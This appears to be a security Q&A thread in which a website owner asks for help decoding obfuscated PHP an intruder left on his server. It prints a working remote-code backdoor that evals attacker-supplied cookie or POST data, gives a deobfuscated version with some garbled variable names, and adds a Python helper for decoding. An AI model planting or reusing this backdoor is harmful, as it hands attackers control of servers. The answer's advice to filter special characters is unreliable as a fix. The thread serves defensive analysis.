
An unfriendly visitor left some code on my website. Unfortunately, the coding makes it hard to understand what he wants (probably full control over my server). Any help in deciphering the actual message would be greatly appreciated. The following snippets are from four different php files:

SNIPPET 1:

$plows = '6pk37x\'#8r9-taugidyecm40svno1Hf2*bl_';
$dsmvel = Array();
$dsmvel[] = $plows[13].$plows[0].$plows[28].$plows[10].$plows[3].$plows[28].$plows[19].$plows[0].$plows[11].$plows[13].$plows[3].$plows[30].$plows[31].$plows[11].$plows[22].$plows[28].$plows[33].$plows[22].$plows[11].$plows[10].$plows[4].$plows[33].$plows[17].$plows[11].$plows[0].$plows[31].$plows[30].$plows[4].$plows[8].$plows[30].$plows[4].$plows[22].$plows[23].$plows[17].$plows[22].$plows[22];
$dsmvel[] = $plows[29].$plows[32];
$dsmvel[] = $plows[7];
$dsmvel[] = $plows[20].$plows[27].$plows[14].$plows[26].$plows[12];
$dsmvel[] = $plows[24].$plows[12].$plows[9].$plows[35].$plows[9].$plows[19].$plows[1].$plows[19].$plows[13].$plows[12];
$dsmvel[] = $plows[19].$plows[5].$plows[1].$plows[34].$plows[27].$plows[17].$plows[19];
$dsmvel[] = $plows[24].$plows[14].$plows[33].$plows[24].$plows[12].$plows[9];
$dsmvel[] = $plows[13].$plows[9].$plows[9].$plows[13].$plows[18].$plows[35].$plows[21].$plows[19].$plows[9].$plows[15].$plows[19];
$dsmvel[] = $plows[24].$plows[12].$plows[9].$plows[34].$plows[19].$plows[26];
$dsmvel[] = $plows[1].$plows[13].$plows[20].$plows[2];
foreach ($dsmvel[7]($_COOKIE, $_POST) as $zboufyf => $dytfo) {
    function acwsil($dsmvel, $zboufyf, $iqobpne) {
        return $dsmvel[6]($dsmvel[4]($zboufyf . $dsmvel[0], ($iqobpne / $dsmvel8) + 1), 0, $iqobpne);
    }
    function mdzodxr($dsmvel, $vozlac) {
        return @$dsmvel[9]($dsmvel[1], $vozlac);
    }
    function btfwmsl($dsmvel, $vozlac) {
        $jlzfvu = $dsmvel3 % 3;
        if (!$jlzfvu) {
            eval($vozlac1);
            exit();
        }
    }
    $dytfo = mdzodxr($dsmvel, $dytfo);
    btfwmsl($dsmvel, $dsmvel[5]($dsmvel[2], $dytfo ^ acwsil($dsmvel, $zboufyf, $dsmvel8)));
}

SNIPPET 2:

eval("\n\$dgreusdi = intval(__LINE__) * 337;");

$a = "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"; $a = str_replace($dgreusdi, "E", $a); eval (gzinflate(base64_decode($a)));

SNIPPET 3: https://pastebin.com/TSv8uHFE

SNIPPET 4: https://pastebin.com/fbUWR6LR

Many thanks in advance!

2 Answers


This code is obfuscated along with base64 encoding and gzinflating. You need to replace certain strings to get the proper encoded version of the script.

The script is using a key called pass, and the attacker later uses the key to compromise your website. It's better to just roll back your website if you have a backup and then add a line to the header of the website to filter all special characters in GET & POST requests. This should stop the attacker from injecting malicious code.


I replaced the characters and formatted everything in a more readable way. However, there are some variables which are not declared properly. Not being a PHP ninja, I could've just missed a language feature. For example, $z is defined, but $z3 is used in the code. This should be invalid --> PHP returns null for undeclared variables.

$x = Array();
$x[0] = "a61931e6-a3f2-41b4-97bd-62f78f740d44";
$x[1] = "H*";
$x[2] = "#";
$x[3] = "count";
$x[4] = "str_repeat";
$x[5] = "explode";
$x[6] = "substr";
$x[7] = "array_merge";
$x[8] = "strlen";
$x[9] = "pack";

foreach (array_merge($_COOKIE, $_POST) as $key => $val) {
    function f2($x, $key, $i) {
        return substr(str_repeat($key . $x[0], ($i / $z) + 1), 0, $i);
    }
    function f3($x, $v) {
        return @pack("H*", $v);
    }
    function f1($x, $v) {
        $a = $x3 % 3;
        if (!$a) {
            eval($v1);
            exit();
        }
    }
    $val = f3($x, $val);
    f1($x, explode("#", $val ^ f2($x, $key, $z)));
}

The second snippet is impossible to decode without knowing __LINE__. The friendly members who commented on your question provided some links to similar questions.

Just copy+paste the PHP code in an editor, replace weird variable names and decode it.

GxTruth
  • Brilliant - but how did you do this, manually? Unlike what the gentlemen who marked this as "duplicate" might think, I had already read the various threads on this site and tried decoding & deobfuscating via various online tools, but came up short-handed. – Brokenstuff Aug 08 '18 at 12:11
  • Never mind - it is indeed all explained here: https://security.stackexchange.com/questions/115461/i-found-unknown-php-code-on-my-server-how-do-i-de-obfuscate-the-code (thanks for the link, I hadn't found that in earlier searches) – Brokenstuff Aug 08 '18 at 12:47
  • First, I formatted it like regular code (there are also tools for this), search&replace'ed all weird variable names in an editor and manually replaced all calls to the array with the respective field-content. That's it, basically. – GxTruth Aug 08 '18 at 13:39
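The manual step GxTruth describes in the comment above (resolving each $dsmvel[N] to the string it stands for and substituting it back into the calls) can be automated for this alphabet-index style of obfuscation. The following Python is an added example and is not code from the question, the answers, or any tool named on this page; it parses the string table of snippet 1 (copied from the question, with the long first entry wrapped over two lines) and inlines the resolved values into any statement handed to it. Function and regex names are my own.

```python
import re

# Copied from snippet 1 in the question: the string table only. The long first
# entry is wrapped over two lines, which the parser tolerates.
SNIPPET_1 = r"""
$plows = '6pk37x\'#8r9-taugidyecm40svno1Hf2*bl_';
$dsmvel = Array();
$dsmvel[] = $plows[13].$plows[0].$plows[28].$plows[10].$plows[3].$plows[28].$plows[19].$plows[0].$plows[11].$plows[13].$plows[3].$plows[30].$plows[31].$plows[11].$plows[22].$plows[28].$plows[33].$plows[22].
            $plows[11].$plows[10].$plows[4].$plows[33].$plows[17].$plows[11].$plows[0].$plows[31].$plows[30].$plows[4].$plows[8].$plows[30].$plows[4].$plows[22].$plows[23].$plows[17].$plows[22].$plows[22];
$dsmvel[] = $plows[29].$plows[32];
$dsmvel[] = $plows[7];
$dsmvel[] = $plows[20].$plows[27].$plows[14].$plows[26].$plows[12];
$dsmvel[] = $plows[24].$plows[12].$plows[9].$plows[35].$plows[9].$plows[19].$plows[1].$plows[19].$plows[13].$plows[12];
$dsmvel[] = $plows[19].$plows[5].$plows[1].$plows[34].$plows[27].$plows[17].$plows[19];
$dsmvel[] = $plows[24].$plows[14].$plows[33].$plows[24].$plows[12].$plows[9];
$dsmvel[] = $plows[13].$plows[9].$plows[9].$plows[13].$plows[18].$plows[35].$plows[21].$plows[19].$plows[9].$plows[15].$plows[19];
$dsmvel[] = $plows[24].$plows[12].$plows[9].$plows[34].$plows[19].$plows[26];
$dsmvel[] = $plows[1].$plows[13].$plows[20].$plows[2];
"""

ALPHABET_RE = re.compile(r"\$(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;")         # $plows = '...';
APPEND_RE = re.compile(r"\$(\w+)\[\]\s*=\s*((?:\$\w+\[\d+\]\s*\.?\s*)+);")  # $dsmvel[] = ...;
INDEX_RE = re.compile(r"\$(\w+)\[(\d+)\]")                                  # $plows[13]

def php_single_quoted(raw: str) -> str:
    """Undo PHP single-quote escaping: only \\' and \\\\ are escape sequences."""
    return re.sub(r"\\(['\\])", r"\1", raw)

def resolve_string_table(src: str) -> dict[str, list[str]]:
    """Evaluate every `$table[] = $alpha[i].$alpha[j]...;` statement found in src."""
    alphabets = {name: php_single_quoted(body) for name, body in ALPHABET_RE.findall(src)}
    tables: dict[str, list[str]] = {}
    for table, expr in APPEND_RE.findall(src):
        chars = [alphabets[alpha][int(i)] for alpha, i in INDEX_RE.findall(expr)]
        tables.setdefault(table, []).append("".join(chars))
    return tables

def inline_references(src: str, tables: dict[str, list[str]]) -> str:
    """Rewrite `$table[N]` to its resolved value: a bare name where it is called
    as a function (directly followed by '('), otherwise a quoted PHP literal."""
    def substitute(m: re.Match) -> str:
        name, idx = m.group(1), int(m.group(2))
        if name not in tables or idx >= len(tables[name]):
            return m.group(0)  # not a known table (e.g. $plows itself): keep as-is
        value = tables[name][idx]
        if src.startswith("(", m.end()):
            return value
        return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"
    return INDEX_RE.sub(substitute, src)
```

Running resolve_string_table(SNIPPET_1) reproduces the ten strings listed in GxTruth's answer, and inline_references can then be applied to the foreach body of snippet 1 to turn $dsmvel[7]($_COOKIE, $_POST) into array_merge($_COOKIE, $_POST).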